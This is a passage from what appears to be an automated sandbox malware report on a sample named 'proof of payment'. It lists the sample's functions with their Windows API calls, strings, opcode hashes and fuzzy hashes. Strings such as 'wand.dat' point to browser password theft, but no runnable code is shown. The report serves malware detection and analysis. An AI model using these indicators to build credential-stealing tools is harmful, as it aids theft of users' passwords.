                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 00410141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                      • String ID: </%s>
                                      • API String ID: 3400436232-259020660
                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040D58D
                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ChildEnumTextWindowWindowsmemset
                                      • String ID: caption
                                      • API String ID: 1523050162-4135340389
                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                      • String ID: MS Sans Serif
                                      • API String ID: 210187428-168460110
                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClassName_wcsicmpmemset
                                      • String ID: edit
                                      • API String ID: 2747424523-2167791130
                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID: SHAutoComplete$shlwapi.dll
                                      • API String ID: 3150196962-1506664499
                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                      • GetMenu.USER32(?), ref: 00410F8D
                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                      • String ID:
                                      • API String ID: 1889144086-0
                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                      • memcpy.MSVCRT ref: 0042EC7A
                                      Strings
                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                      • API String ID: 1297977491-2063813899
                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040560C
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.*$dat$wand.dat
                                      • API String ID: 2618321458-1828844352
                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • wcslen.MSVCRT ref: 00410C74
                                      • _wtoi.MSVCRT ref: 00410C80
                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                      • String ID:
                                      • API String ID: 1549203181-0
                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00412057
                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                      • String ID:
                                      • API String ID: 3550944819-0
                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • memcpy.MSVCRT ref: 0040A94F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040B1DE
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                      • memcpy.MSVCRT ref: 0040B248
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • strlen.MSVCRT ref: 0040B0D8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                      • memcpy.MSVCRT ref: 0040B159
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 1171893557-0
                                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004144E7
                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                      • memset.MSVCRT ref: 0041451A
                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                      • String ID:
                                      • API String ID: 1127616056-0
                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                      • wcscpy.MSVCRT ref: 00414DF3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                      • String ID:
                                      • API String ID: 3917621476-0
                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                      • malloc.MSVCRT ref: 00417459
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                      • RegisterClassW.USER32(?), ref: 00412428
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                      • String ID:
                                      • API String ID: 2678498856-0
                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item
                                      • String ID:
                                      • API String ID: 3888421826-0
                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                      Download Yara Rule
                                      APIs
